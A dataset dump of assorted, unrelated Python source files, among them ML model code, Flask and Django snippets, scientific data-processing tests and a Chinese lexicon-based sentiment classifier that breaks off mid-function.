content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
from Jumpscale import j
def test():
"""
to run:
kosmos 'j.data.rivine.test(name="sia_basic")'
"""
e = j.data.rivine.encoder_sia_get()
# you can add integers, booleans, iterateble objects, strings,
# bytes and byte arrays. Dictionaries and objects are not supported.
e.add(False)
e.add("a")
e.add([1, True, "foo"])
e.add(b"123")
# the result is a single bytearray
assert (
e.data
== b"\x00\x01\x00\x00\x00\x00\x00\x00\x00a\x03\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00foo\x03\x00\x00\x00\x00\x00\x00\x00123"
)
|
nilq/baby-python
|
python
|
from nose.tools import *
from ..app import address_parts
@raises(TypeError)
def test_address_parts_no_address():
expected = []
actual = address_parts()
def test_address_parts_with_address():
expected = ['AddressNumber', 'StreetName']
actual = address_parts('123 main')
assert actual == expected
|
nilq/baby-python
|
python
|
from sys import *
def parse_weights(numberExpectedParams, filename):
f = open(filename, 'r')
contents = f.readlines()
params = []
linenumber=0
for i in contents:
linenumber = linenumber + 1
i = i.strip()
if i == "":
continue
try:
paramVal = float(i)
params.append(paramVal)
except ValueError:
print "Ao ler arquivo de parametros (%s), esperava um numero real na linha %d, mas encontrou '%s'. Verifique" % (filename, linenumber, i)
exit()
if len(params) != numberExpectedParams:
print "Numero incorreto de pesos no arquivo informado! Foram encontrados %d pesos, mas o seu controlador utiliza %d" % (len(params), numberExpectedParams)
exit()
print "Leitura de %d pesos teve sucesso: %s" % (numberExpectedParams, params)
return params
|
nilq/baby-python
|
python
|
from flask import current_app as app
from flask import jsonify, request
from director.api import api_bp
from director.builder import WorkflowBuilder
from director.exceptions import WorkflowNotFound
from director.extensions import cel_workflows, schema
from director.models.workflows import Workflow
@api_bp.route("/workflows", methods=["POST"])
@schema.validate(
{
"required": ["project", "name", "payload"],
"additionalProperties": False,
"properties": {
"project": {"type": "string"},
"name": {"type": "string"},
"payload": {"type": "object"},
},
}
)
def create_workflow():
data = request.get_json()
project = data["project"]
name = data["name"]
fullname = f"{project}.{name}"
# Check if the workflow exists
try:
cel_workflows.get_by_name(fullname)
except WorkflowNotFound:
return jsonify({"error": f"Workflow {fullname} not found"}), 404
# Create the workflow in DB
obj = Workflow(project=project, name=name, payload=data["payload"])
obj.save()
# Build the workflow and execute it
data = obj.to_dict()
workflow = WorkflowBuilder(obj.id)
workflow.run()
app.logger.info(f"Workflow ready : {workflow.canvas}")
return jsonify(data), 201
@api_bp.route("/workflows")
def list_workflows():
workflows = Workflow.query.all()
return jsonify([w.to_dict() for w in workflows])
@api_bp.route("/workflows/<workflow_id>")
def get_workflow(workflow_id):
workflow = Workflow.query.filter_by(id=workflow_id).first()
if not workflow:
return jsonify({"error": f"Workflow {workflow_id} not found"}), 404
tasks = [t.to_dict() for t in workflow.tasks]
resp = workflow.to_dict()
resp.update({"tasks": tasks})
return jsonify(resp)
|
nilq/baby-python
|
python
|
nome = input('Digite seu nome:')
if nome == 'Cristiano':
print('Sou eu')
else:
print('Não sou seu')
|
nilq/baby-python
|
python
|
from django.db import models
from bitoptions import BitOptions, BitOptionsField
TOPPINGS = BitOptions(
('pepperoni', 'mushrooms', 'onions', 'sausage', 'bacon', 'black olives',
'green olives', 'green peppers', 'pineapple', 'spinach', 'tomatoes',
'broccoli', 'jalapeno peppers', 'anchovies', 'chicken', 'beef', 'ham',
'salami')
)
CHEESES = BitOptions(('feta', 'parmesan', 'provolone', 'goat', 'mozzarella'))
COLORS = BitOptions(('red', 'green', 'blue'))
class Box(models.Model):
"""
Test model with nullable BitOptionsField.
"""
colors = BitOptionsField(options=COLORS, null=True, blank=True)
class Pizza(models.Model):
"""
Test model with small and medium size list of options.
"""
toppings = BitOptionsField(options=TOPPINGS)
cheeses = BitOptionsField(options=CHEESES)
|
nilq/baby-python
|
python
|
print(["ABC","ARC","AGC"][int(input())//50+8>>5])
|
nilq/baby-python
|
python
|
from __future__ import print_function
import sys
if sys.version_info < (3, 8):
print(file=sys.stderr)
print('This game needs Python 3.8 or later; preferably 3.9.', file=sys.stderr)
exit(1)
try:
import moderngl
import pyglet
import png
except ImportError:
print(file=sys.stderr)
print('You need to install dependencies for this game:', file=sys.stderr)
print(file=sys.stderr)
print(' python -m pip install -r requirements.txt', file=sys.stderr)
print(file=sys.stderr)
exit(1)
import keypad_racer.__main__
|
nilq/baby-python
|
python
|
#!/usr/bin/python2
#Dasporal
import swiftclient
import os, sys, mimetypes
import requests
import json
import pprint
data = file(os.path.join(sys.path[0], "../tokens.json"))
tokens = json.load(data)
if len(sys.argv) != 2 or len(sys.argv) != 3:
print ("Usage: podcast_upload.py [audio file name]")
exit(1)
# Fetching infos on the file path
file_path = os.path.abspath(sys.argv[1])
file_name = os.path.basename(sys.argv[1])
# Opening file
try:
episode = open(file_path)
except IOError:
print ("File ", file_path, " not found.")
exit(1)
# Uploading to Mixcloud
print ("Uploading of ", file_name, " on Mixcloud started...")
# Filling the requests parameters
files = {"mp3": episode}
url = "https://api.mixcloud.com/upload/"
params = {"access_token": tokens["mixcloud"]["test_token"]}
data = {"name": "Test API"}
# API request
r = requests.post(url, data=data, params=params, files=files)
# Error handling
if (r.status_code == 200):
print ("Upload to Mixcloud succeeded!")
else:
print ("Upload to Mixcloud failed with error code ", str(r.status_code), " (", r.reason, ")")
exit(1)
# OpenStack
# Setting options
options = {}
options['tenant_id'] = tokens["openstack"]["tenant_id"]
options['region_name'] = tokens["openstack"]["region_name"]
# Opening connection
client = swiftclient.client.Connection(tokens["openstack"]["auth_url"], tokens["openstack"]["username"], tokens["openstack"]["password"], 5, None, None, False, 1, 64, tokens["openstack"]["tenant_name"], options, '2')
# Getting infos on the file
episode_size = os.stat(file_path).st_size
episode_content = episode.read(episode_size)
# Uploading
print ("Uploading of ", file_name, " on OpenStack started...")
try:
client.put_object("podcasts", file_name, episode_content, episode_size, None, None, "audio/mpeg")
except swiftclient.exceptions.ClientException as e:
print ("Error: Server responded to the PUT request on ", e.http_path, " with ", str(e.http_status), " ", e.http_reason)
exit(1)
print ("Upload to OpenStack succeeded!")
|
nilq/baby-python
|
python
|
DEFAULT_USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
SPECIAL_CASES = {
'ee': 'et',
}
LANGUAGES = {
'af': 'afrikaans',
'sq': 'albanian',
'ar': 'arabic',
'be': 'belarusian',
'bg': 'bulgarian',
'ca': 'catalan',
'zh-CN': 'chinese_simplified',
'zh-TW': 'chinese_traditional',
'hr': 'croatian',
'cs': 'czech',
'da': 'danish',
'nl': 'dutch',
'en': 'english',
'eo': 'esperanto',
'et': 'estonian',
'tl': 'filipino',
'fi': 'finnish',
'fr': 'french',
'gl': 'galician',
'de': 'german',
'el': 'greek',
'iw': 'hebrew',
'hi': 'hindi',
'hu': 'hungarian',
'is': 'icelandic',
'id': 'indonesian',
'ga': 'irish',
'it': 'italian',
'ja': 'japanese',
'ko': 'korean',
'la': 'latin',
'lv': 'latvian',
'lt': 'lithuanian',
'mk': 'macedonian',
'ms': 'malay',
'mt': 'maltese',
'no': 'norwegian',
'fa': 'persian',
'pl': 'polish',
'pt': 'portuguese',
'ro': 'romanian',
'ru': 'russian',
'sr': 'serbian',
'sk': 'slovak',
'sl': 'slovenian',
'es': 'spanish',
'sw': 'swahili',
'sv': 'swedish',
'th': 'thai',
'tr': 'turkish',
'uk': 'ukrainian',
'vi': 'vietnamese',
'cy': 'welsh',
'yi': 'yiddish',
}
|
nilq/baby-python
|
python
|
from keras.engine import InputSpec
from keras.layers import Dense
from keras.layers.wrappers import Wrapper, TimeDistributed
class Highway(Wrapper):
def __init__(self, layer, gate=None, **kwargs):
self.supports_masking = True
self.gate = gate
super(Highway, self).__init__(layer, **kwargs)
def build(self, input_shape=None):
assert len(input_shape) in [2, 3]
self.input_spec = [InputSpec(shape=input_shape)]
nb_output_dims = input_shape[-1]
if self.gate is None:
gate = Dense(nb_output_dims, activation='sigmoid')
if len(input_shape) == 3:
gate = TimeDistributed(gate)
self.gate = gate
super(Highway, self).build(input_shape)
def get_output_shape_for(self, input_shape):
assert self.layer.get_output_shape_for(input_shape) == input_shape
assert self.gate.get_output_shape_for(input_shape) == input_shape
return input_shape
def call(self, x, mask=None):
return self.layer(x) * self.gate(x) + x * (1 - self.gate(x))
|
nilq/baby-python
|
python
|
import tensorflow as tf
import tqdm
from one_shot_learning_network import MatchingNetwork
class ExperimentBuilder:
def __init__(self, data):
"""
Initializes an ExperimentBuilder object. The ExperimentBuilder object takes care of setting up our experiment
and provides helper functions such as run_training_epoch and run_validation_epoch to simplify out training
and evaluation procedures.
:param data: A data provider class
"""
self.data = data
def build_experiment(self, batch_size, classes_per_set, samples_per_class, fce):
"""
:param batch_size: The experiment batch size
:param classes_per_set: An integer indicating the number of classes per support set
:param samples_per_class: An integer indicating the number of samples per class
:param channels: The image channels
:param fce: Whether to use full context embeddings or not
:return: a matching_network object, along with the losses, the training ops and the init op
"""
height, width, channels = self.data.x.shape[2], self.data.x.shape[3], self.data.x.shape[4]
self.support_set_images = tf.placeholder(tf.float32, [batch_size, classes_per_set, samples_per_class, height, width,
channels], 'support_set_images')
self.support_set_labels = tf.placeholder(tf.int32, [batch_size, classes_per_set, samples_per_class], 'support_set_labels')
self.target_image = tf.placeholder(tf.float32, [batch_size, height, width, channels], 'target_image')
self.target_label = tf.placeholder(tf.int32, [batch_size], 'target_label')
self.training_phase = tf.placeholder(tf.bool, name='training-flag')
self.rotate_flag = tf.placeholder(tf.bool, name='rotate-flag')
self.keep_prob = tf.placeholder(tf.float32, name='dropout-prob')
self.current_learning_rate = 1e-03
self.learning_rate = tf.placeholder(tf.float32, name='learning-rate-set')
self.one_shot_omniglot = MatchingNetwork(batch_size=batch_size, support_set_images=self.support_set_images,
support_set_labels=self.support_set_labels,
target_image=self.target_image, target_label=self.target_label,
keep_prob=self.keep_prob, num_channels=channels,
is_training=self.training_phase, fce=fce, rotate_flag=self.rotate_flag,
num_classes_per_set=classes_per_set,
num_samples_per_class=samples_per_class, learning_rate=self.learning_rate)
summary, self.losses, self.c_error_opt_op = self.one_shot_omniglot.init_train()
init = tf.global_variables_initializer()
self.total_train_iter = 0
return self.one_shot_omniglot, self.losses, self.c_error_opt_op, init
def run_training_epoch(self, total_train_batches, sess):
"""
Runs one training epoch
:param total_train_batches: Number of batches to train on
:param sess: Session object
:return: mean_training_categorical_crossentropy_loss and mean_training_accuracy
"""
total_c_loss = 0.
total_accuracy = 0.
with tqdm.tqdm(total=total_train_batches) as pbar:
for i in range(total_train_batches): # train epoch
x_support_set, y_support_set, x_target, y_target = self.data.get_train_batch(augment=True)
_, c_loss_value, acc = sess.run(
[self.c_error_opt_op, self.losses[self.one_shot_omniglot.classify], self.losses[self.one_shot_omniglot.dn]],
feed_dict={self.keep_prob: 1.0, self.support_set_images: x_support_set,
self.support_set_labels: y_support_set, self.target_image: x_target, self.target_label: y_target,
self.training_phase: True, self.rotate_flag: False, self.learning_rate: self.current_learning_rate})
iter_out = "train_loss: {}, train_accuracy: {}".format(c_loss_value, acc)
pbar.set_description(iter_out)
pbar.update(1)
total_c_loss += c_loss_value
total_accuracy += acc
self.total_train_iter += 1
if self.total_train_iter % 2000 == 0:
self.current_learning_rate /= 2
print("change learning rate", self.current_learning_rate)
total_c_loss = total_c_loss / total_train_batches
total_accuracy = total_accuracy / total_train_batches
return total_c_loss, total_accuracy
def run_validation_epoch(self, total_val_batches, sess):
"""
Runs one validation epoch
:param total_val_batches: Number of batches to train on
:param sess: Session object
:return: mean_validation_categorical_crossentropy_loss and mean_validation_accuracy
"""
total_val_c_loss = 0.
total_val_accuracy = 0.
with tqdm.tqdm(total=total_val_batches) as pbar:
for i in range(total_val_batches): # validation epoch
x_support_set, y_support_set, x_target, y_target = self.data.get_val_batch(augment=True)
c_loss_value, acc = sess.run(
[self.losses[self.one_shot_omniglot.classify], self.losses[self.one_shot_omniglot.dn]],
feed_dict={self.keep_prob: 1.0, self.support_set_images: x_support_set,
self.support_set_labels: y_support_set, self.target_image: x_target, self.target_label: y_target,
self.training_phase: False, self.rotate_flag: False})
iter_out = "val_loss: {}, val_accuracy: {}".format(c_loss_value, acc)
pbar.set_description(iter_out)
pbar.update(1)
total_val_c_loss += c_loss_value
total_val_accuracy += acc
total_val_c_loss = total_val_c_loss / total_val_batches
total_val_accuracy = total_val_accuracy / total_val_batches
return total_val_c_loss, total_val_accuracy
def run_testing_epoch(self, total_test_batches, sess):
"""
Runs one testing epoch
:param total_test_batches: Number of batches to train on
:param sess: Session object
:return: mean_testing_categorical_crossentropy_loss and mean_testing_accuracy
"""
total_test_c_loss = 0.
total_test_accuracy = 0.
with tqdm.tqdm(total=total_test_batches) as pbar:
for i in range(total_test_batches):
x_support_set, y_support_set, x_target, y_target = self.data.get_test_batch(augment=True)
c_loss_value, acc = sess.run(
[self.losses[self.one_shot_omniglot.classify], self.losses[self.one_shot_omniglot.dn]],
feed_dict={self.keep_prob: 1.0, self.support_set_images: x_support_set,
self.support_set_labels: y_support_set, self.target_image: x_target,
self.target_label: y_target,
self.training_phase: False, self.rotate_flag: False})
iter_out = "test_loss: {}, test_accuracy: {}".format(c_loss_value, acc)
pbar.set_description(iter_out)
pbar.update(1)
total_test_c_loss += c_loss_value
total_test_accuracy += acc
total_test_c_loss = total_test_c_loss / total_test_batches
total_test_accuracy = total_test_accuracy / total_test_batches
return total_test_c_loss, total_test_accuracy
|
nilq/baby-python
|
python
|
from __future__ import annotations
from typing import TYPE_CHECKING
from os import chdir, path
from asdfy import ASDFProcessor, ASDFAccessor
if TYPE_CHECKING:
from obspy import Trace, Stream
if not path.exists('traces.h5') and path.exists('tests/traces.h5'):
chdir('tests')
def func1(stream: Stream):
# save waveform by returning a Stream
return stream
def func2(acc: ASDFAccessor):
# save waveform by returning a Stream
assert acc.fellows and len(acc.fellows) == 9, f'incorrect station number'
for acc2 in acc.fellows:
assert acc2.component == acc.component
assert acc2.ds is acc.ds
output = {}
for trace in acc.stream:
output[trace.stats.channel] = trace
return output
def func3(trace: Trace):
trace.filter('lowpass', freq=1/17)
# save waveform by returning a Trace
return trace
def func4(syn_acc, obs_acc):
syn = syn_acc.trace
obs = obs_acc.trace
data = syn.data - obs.data # type: ignore
stats = syn.stats
assert len(syn_acc.fellows) == 27, f'incorrect station number {len(syn_acc.fellows)}'
assert len(obs_acc.fellows) == 27, f'incorrect station number {len(obs_acc.fellows)}'
for acc in syn_acc.fellows:
assert acc.ds is syn_acc.ds
for acc in obs_acc.fellows:
assert acc.ds is obs_acc.ds
# save as auxiliary data by returning a tuple
return data, {
'misfit': data.std(),
'network': stats.network,
'station': stats.station,
'component': stats.component}
def func5(acc):
from asdfy import ASDFAuxiliary
# save as auxiliary data by returning namedtuple `ASDFAuxiliary`
return ASDFAuxiliary(acc.data, acc.auxiliary.parameters)
def func6(aux_group):
from obspy import Trace, Stream
# save waveform by returning a Trace
traces = []
for cha, aux in aux_group.items():
assert cha[-1] == aux.parameters['component']
traces.append(Trace(aux.data, header=aux.parameters))
return Stream(traces)
def reset():
from subprocess import check_call
check_call('rm -f proc1.h5', shell=True)
check_call('rm -f proc2.h5', shell=True)
check_call('rm -f proc3.h5', shell=True)
check_call('rm -f proc4.h5', shell=True)
check_call('rm -f proc5.h5', shell=True)
check_call('rm -f proc6.h5', shell=True)
def verify():
from numpy.linalg import norm
from pyasdf import ASDFDataSet
with ASDFDataSet('proc1.h5', mode='r', mpi=False) as ds:
assert len(ds.events) == 1
assert hasattr(ds.waveforms['II.BFO'], 'StationXML')
with ASDFDataSet('proc6.h5', mode='r', mpi=False) as ds:
data_proc = ds.waveforms['II.BFO'].test[0].data # type: ignore
with ASDFDataSet('traces_proc.h5', mode='r', mpi=False) as ds:
data_ref = ds.waveforms['II.BFO'].test[0].data # type: ignore
assert norm(data_proc - data_ref) / norm(data_ref) < 1e-4
print('pass')
reset()
def verify_mpi():
from mpi4py.MPI import COMM_WORLD as comm
rank = comm.Get_rank()
if rank == 0:
verify()
def test():
from mpi4py.MPI import COMM_WORLD as comm
rank = comm.Get_rank()
if rank == 0:
reset()
# process stream data
ap = ASDFProcessor('traces.h5', 'proc1.h5', func1, input_type='stream', input_tag='synthetic')
if rank == 0:
print('test1: stream -> stream')
assert len(ap.access()) == 9
ap.run()
# process stream data with more info passed
if rank == 0:
print('test2: accessor -> stream')
ASDFProcessor('traces.h5', 'proc2.h5', func2, input_type='stream', accessor=True).run()
# process trace data
if rank == 0:
print('test3: trace -> trace')
ASDFProcessor('proc2.h5', 'proc3.h5', func3).run()
# process trace data (save with a different tag)
if rank == 0:
print('test4: (trace, trace) -> auxiliary')
ASDFProcessor(('proc1.h5', 'proc3.h5'), 'proc4.h5', func4, accessor=True, output_tag='test').run()
# process auxiliary data with more info passed
if rank == 0:
print('test5: accessor -> auxiliary')
ASDFProcessor('proc4.h5', 'proc5.h5', func5, input_type='auxiliary', accessor=True, input_tag='test').run()
# process auxiliary data
if rank == 0:
print('test6: auxiliary_group -> stream')
ASDFProcessor('proc5.h5', 'proc6.h5', func6, input_type='auxiliary_group').run()
if rank == 0:
verify()
if __name__ == '__main__':
test()
|
nilq/baby-python
|
python
|
import numpy as np
from starfish.core.expression_matrix.concatenate import concatenate
from starfish.core.expression_matrix.expression_matrix import ExpressionMatrix
from starfish.types import Features
def test_concatenate_two_expression_matrices():
a_data = np.array(
[[0, 1],
[1, 0]]
)
b_data = np.array(
[[0],
[1]]
)
dims = [Features.CELLS, Features.GENES]
a_coords = [(Features.CELLS, [0, 1]), (Features.GENES, ["x", "y"])]
b_coords = [(Features.CELLS, [0, 1]), (Features.GENES, ["x"])]
a = ExpressionMatrix(a_data, dims=dims, coords=a_coords)
b = ExpressionMatrix(b_data, dims=dims, coords=b_coords)
concatenated = concatenate([a, b])
expected = np.array(
[[0, 1],
[1, 0],
[0, np.nan],
[1, np.nan]]
)
np.testing.assert_equal(concatenated.values, expected)
|
nilq/baby-python
|
python
|
"""The plugin module implements various plugins to extend the behaviour
of community app.
The plugins provided by this module are:
SketchsTab - additional tab to show on the profile pages
LiveCodeExtension - injecting livecode css/js into lesson page
"""
import frappe
from community.plugins import PageExtension, ProfileTab
from community.widgets import Widgets
from .overrides import Sketch
class SketchesTab(ProfileTab):
def get_title(self):
return "Sketches"
def render(self):
sketches = Sketch.get_recent_sketches(owner=self.user.name, limit=16)
context = dict(sketches=sketches, widgets=Widgets())
return frappe.render_template(
"templates/profile/sketches.html",
context)
class LiveCodeExtension(PageExtension):
def render_header(self):
livecode_url = frappe.get_value("LMS Settings", None, "livecode_url")
context = {
"livecode_url": livecode_url
}
return frappe.render_template(
"templates/livecode/extension_header.html",
context)
def render_footer(self):
livecode_url = frappe.get_value("LMS Settings", None, "livecode_url")
context = {
"livecode_url": livecode_url
}
return frappe.render_template(
"templates/livecode/extension_footer.html",
context)
def exercise_renderer(argument):
exercise = frappe.get_doc("Exercise", argument)
context = dict(exercise=exercise)
return frappe.render_template("templates/exercise.html", context)
def image_renderer(argument):
"""Markdown macro for Image.
Rendered the image of an exercise.
This is a hack to extend the already exiting exercise infrastrcture
to use for showing images. To distinguish between real exercises and
the exercises used for showing images, the latter ones are prefixed
with `image-`.
usage:
{{ Image("image-flag-of-germany") }}
"""
exercise = frappe.get_doc("Exercise", argument)
context = dict(exercise=exercise)
return frappe.render_template("templates/image.html", context)
def youtube_video_renderer(video_id):
return f"""
<iframe width="560" height="315"
src="https://www.youtube.com/embed/{video_id}"
title="YouTube video player"
frameborder="0"
allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen>
</iframe>
"""
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
@description: 分类器
@author:XuMing
"""
import re
import jieba
from jieba import posseg
class DictClassifier:
def __init__(self):
self.__root_path = "data/dict/"
jieba.load_userdict("data/dict/user.dict") # 自定义分词词库
# 情感词典
self.__phrase_dict = self.__get_phrase_dict()
self.__positive_dict = self.__get_dict(self.__root_path + "positive_dict.txt")
self.__negative_dict = self.__get_dict(self.__root_path + "negative_dict.txt")
self.__conjunction_dict = self.__get_dict(self.__root_path + "conjunction_dict.txt")
self.__punctuation_dict = self.__get_dict(self.__root_path + "punctuation_dict.txt")
self.__adverb_dict = self.__get_dict(self.__root_path + "adverb_dict.txt")
self.__denial_dict = self.__get_dict(self.__root_path + "denial_dict.txt")
def classify(self, sentence):
return self.analyse_sentence(sentence)
def analysis_file(self, file_path_in, file_path_out, encoding='utf-8', print_show=False, start=0, end=-1):
results = []
with open(file_path_in, 'r', encoding=encoding) as f:
num_line = 0
for line in f:
# 语料开始位置
num_line += 1
if num_line < start:
continue
results.append(self.analysis_sentence(line.strip(), file_path_out, print_show))
# 语料结束位置
if 0 < end <= num_line:
break
return results
def analyse_sentence(self, sentence, run_out_file_path=None, print_show=False):
# 情感分析的数据结构
comment_analysis = {"score": 0}
# 评论分句
clauses = self.__divide_sentence_to_clause(sentence + '%')
# 对每个分句情感分析
for i in range(len(clauses)):
# 分析子句的数据结构
sub_clause = self.__analyse_clause(clauses[i].replace("。", "."), run_out_file_path, print_show)
# 将子句分析的数据结果添加到整体数据结构中
comment_analysis["su-clause" + str(i)] = sub_clause
comment_analysis["score"] += sub_clause["score"]
if run_out_file_path is not None:
# 将整句写到输出文件
self.__write_out_file(run_out_file_path, "\n" + sentence + "\n")
self.__output_analysis(comment_analysis, run_out_file_path)
self.__write_out_file(run_out_file_path, str(comment_analysis) + "\n\n")
if print_show:
print("\n" + sentence)
self.__output_analysis(comment_analysis)
print(comment_analysis)
if comment_analysis["score"] > 0:
return 1
else:
return 0
def __divide_sentence_to_clause(self, sentence):
clauses = self.__split_sentence(sentence)
clauses[-1] = clauses[-1][:-1]
return clauses
def __analyse_clause(self, clauses, run_out_file_path, print_show):
sub_clause = {"score": 0, "positive": [], "negative": [], "conjunction": [], "punctuation": [], "pattern": []}
seg_result = posseg.lcut(clauses)
# 输出分词结果
if run_out_file_path is not None:
self.__write_out_file(run_out_file_path, clauses + "\n")
self.__write_out_file(run_out_file_path, str(seg_result) + "\n")
if print_show:
print(clauses)
print(seg_result)
# 判断句子:如果。。。就好了
judgement = self.__is_clause_pattern_if_good(clauses)
if judgement != "":
sub_clause["pattern"].append(judgement)
sub_clause["score"] -= judgement["value"]
return sub_clause
# 判断句子:是。。。不是。。。
judgement = self.__is_clause_pattern_is_not(clauses)
if judgement != "":
sub_clause["pattern"].append(clauses)
sub_clause["score"] -= judgement["value"]
# 判断句子:短语
judgement = self.__is_clause_pattern_phrase(clauses, seg_result)
if judgement != "":
sub_clause["score"] += judgement["score"]
if judgement["score"] >= 0:
sub_clause["positive"].append(judgement)
elif judgement["score"] < 0:
sub_clause["negative"].append(judgement)
match_result = judgement["key"].split(":")[-1]
i = 0
while i < len(seg_result):
if seg_result[i].word in match_result:
if i + 1 == len(seg_result) or seg_result[i + 1].word in match_result:
del (seg_result[i])
continue
i += 1
# 逐个分词
for i in range(len(seg_result)):
mark, result = self.__analyse_word(seg_result[i].word, seg_result, i)
if mark == 0:
continue
elif mark == 1:
sub_clause["conjunction"].append(result)
elif mark == 2:
sub_clause["punctuation"].append(result)
elif mark == 3:
sub_clause["positive"].append(result)
sub_clause["score"] += result["score"]
elif mark == 4:
sub_clause["negative"].append(result)
sub_clause["score"] -= result["score"]
# 综合连词的情感值
for conj in sub_clause["conjunction"]:
sub_clause["score"] *= conj["value"]
# 综合标点符号的情感值
for punc in sub_clause["punctuation"]:
sub_clause["score"] *= punc["value"]
return sub_clause
@staticmethod
def __is_clause_pattern_if_good(clauses):
re_pattern = re.compile(r".*(要|选)的.+(送|给).*")
match = re_pattern.match(clauses)
if match is not None:
pattern = {"key": "要的是...给的是...", "value": 1}
return pattern
return ""
@staticmethod
def __is_clause_pattern_is_not(clauses):
re_pattern = re.compile(r".*(如果|要是|希望).+就[\u4e00-\u9fa5]+(好|完美)了")
match = re_pattern.match(clauses)
if match is not None:
pattern = {"key": "如果...就好了", "value": 1.0}
return pattern
return ""
def __is_clause_pattern_phrase(self, clauses, seg_result):
for phrase in self.__phrase_dict:
keys = phrase.keys()
to_compile = phrase["key"].replace("……", "[\u4e00-\u9fa5]*")
if "start" in keys:
to_compile = to_compile.replace("*", "{" + phrase["start"] + "," + phrase["end"] + "}")
if "head" in keys:
to_compile = phrase["head"] + to_compile
match = re.compile(to_compile).search(clauses)
if match is not None:
is_continue = True
pos = [flag for word, flag in posseg.cut(match.group())]
if "between_tag" in keys:
if phrase["between_tag"] not in pos and len(pos) > 2:
is_continue = False
if is_continue:
for i in range(len(seg_result)):
if seg_result[i].word in match.group():
try:
if seg_result[i + 1].word in match.group():
return self.__emotional_word_analysis(
phrase["key"] + ":" + match.group(), phrase["value"],
[x for x, y in seg_result], i)
except IndexError:
return self.__emotional_word_analysis(
phrase["key"] + ":" + match.group(), phrase["value"],
[x for x, y in seg_result], i)
return ""
def __emotional_word_analysis(self, core_word, value, segments, index):
# 情感词典内,则构建一个以情感词为中心的字典数据结构
orientation = {"key": core_word, "adverb": [], "denial": [], "value": value}
orientation_score = orientation["value"]
# 判断三个前视窗内是否有否定词、副词
view_window = index - 1
if view_window > -1:
# 前词是否是情感词
if segments[view_window] in self.__negative_dict or segments[view_window] in self.__positive_dict:
orientation["score"] = orientation_score
return orientation
# 前词是否是副词
if segments[view_window] in self.__adverb_dict:
adverb = {"key": segments[view_window], "position": 1,
"value": self.__adverb_dict[segments[view_window]]}
orientation["adverb"].append(adverb)
orientation_score *= self.__adverb_dict[segments[view_window]]
# 前词是否是否定词
elif segments[view_window] in self.__denial_dict:
denial = {"key": segments[view_window], "position": 1,
"value": self.__denial_dict[segments[view_window]]}
orientation["denial"].append(denial)
orientation_score *= -1
view_window = index - 2
if view_window > -1:
# 判断前一个词是否是情感词
if segments[view_window] in self.__negative_dict or \
segments[view_window] in self.__positive_dict:
orientation['score'] = orientation_score
return orientation
if segments[view_window] in self.__adverb_dict:
adverb = {"key": segments[view_window], "position": 2,
"value": self.__adverb_dict[segments[view_window]]}
orientation_score *= self.__adverb_dict[segments[view_window]]
orientation["adverb"].insert(0, adverb)
elif segments[view_window] in self.__denial_dict:
denial = {"key": segments[view_window], "position": 2,
"value": self.__denial_dict[segments[view_window]]}
orientation["denial"].insert(0, denial)
orientation_score *= -1
# 判断是否是“不是很好”的结构(区别于“很不好”)
if len(orientation["adverb"]) > 0:
# 是,则引入调节阈值,0.3
orientation_score *= 0.3
view_window = index - 3
if view_window > -1:
# 判断前一个词是否是情感词
if segments[view_window] in self.__negative_dict or segments[view_window] in self.__positive_dict:
orientation['score'] = orientation_score
return orientation
if segments[view_window] in self.__adverb_dict:
adverb = {"key": segments[view_window], "position": 3,
"value": self.__adverb_dict[segments[view_window]]}
orientation_score *= self.__adverb_dict[segments[view_window]]
orientation["adverb"].insert(0, adverb)
elif segments[view_window] in self.__denial_dict:
denial = {"key": segments[view_window], "position": 3,
"value": self.__denial_dict[segments[view_window]]}
orientation["denial"].insert(0, denial)
orientation_score *= -1
# 判断是否是“不是很好”的结构(区别于“很不好”)
if len(orientation["adverb"]) > 0 and len(orientation["denial"]) == 0:
orientation_score *= 0.3
# 添加情感分析值
orientation['score'] = orientation_score
# 返回的数据结构
return orientation
def __analyse_word(self, word, seg_result=None, index=-1):
# 判断连词
judgement = self.__is_word_conjunction(word)
if judgement != "":
return 1, judgement
# 判断标点符号
judgement = self.__is_word_punctuation(word)
if judgement != "":
return 2, judgement
# 判断正向情感词
judgement = self.__is_word_positive(word, seg_result, index)
if judgement != "":
return 3, judgement
# 判断负向情感词
judgement = self.__is_word_negative(word, seg_result, index)
if judgement != "":
return 4, judgement
return 0, ""
def __is_word_conjunction(self, word):
if word in self.__conjunction_dict:
conjunction = {"key": word, "value": self.__conjunction_dict[word]}
return conjunction
return ""
def __is_word_punctuation(self, word):
if word in self.__punctuation_dict:
punctuation = {"key": word, "value": self.__punctuation_dict[word]}
return punctuation
return ""
def __is_word_positive(self, word, seg_result, index):
"""
判断分词在正向情感词典内
:param word:
:param seg_result:
:param index:
:return:
"""
if word in self.__positive_dict:
return self.__emotional_word_analysis(word, self.__positive_dict[word],
[x for x, y in seg_result], index)
return ""
def __is_word_negative(self, word, seg_result, index):
"""
判断分词在负向情感词典内
:param word:
:param seg_result:
:param index:
:return:
"""
if word in self.__negative_dict:
return self.__emotional_word_analysis(word, self.__negative_dict[word],
[x for x, y in seg_result], index)
return ""
def __output_analysis(self, comment_analysis, run_out_file_path=None):
output = "Score:" + str(comment_analysis["score"]) + "\n"
for i in range(len(comment_analysis) - 1):
output += "Sub-clause" + str(i) + ": "
clause = comment_analysis["su-clause" + str(i)]
if len(clause["conjunction"]) > 0:
output += "conjunction:"
for punctuation in clause["conjunction"]:
output += punctuation["key"] + " "
if len(clause["positive"]) > 0:
output += "positive:"
for positive in clause["positive"]:
if len(positive["denial"]) > 0:
for denial in positive["denial"]:
output += denial["key"] + str(denial["position"]) + "-"
if len(positive['adverb']) > 0:
for adverb in positive["adverb"]:
output += adverb["key"] + str(adverb["position"]) + "-"
output += positive["key"] + " "
if len(clause["negative"]) > 0:
output += "negative:"
for negative in clause["negative"]:
if len(negative["denial"]) > 0:
for denial in negative["denial"]:
output += denial["key"] + str(denial["position"]) + "-"
if len(negative["adverb"]) > 0:
for adverb in negative["adverb"]:
output += adverb["key"] + str(adverb["position"]) + "-"
output += negative["key"] + " "
if len(clause["punctuation"]) > 0:
output += "punctuation:"
for pattern in clause["pattern"]:
output += pattern["key"] + " "
output += "\n"
if run_out_file_path is not None:
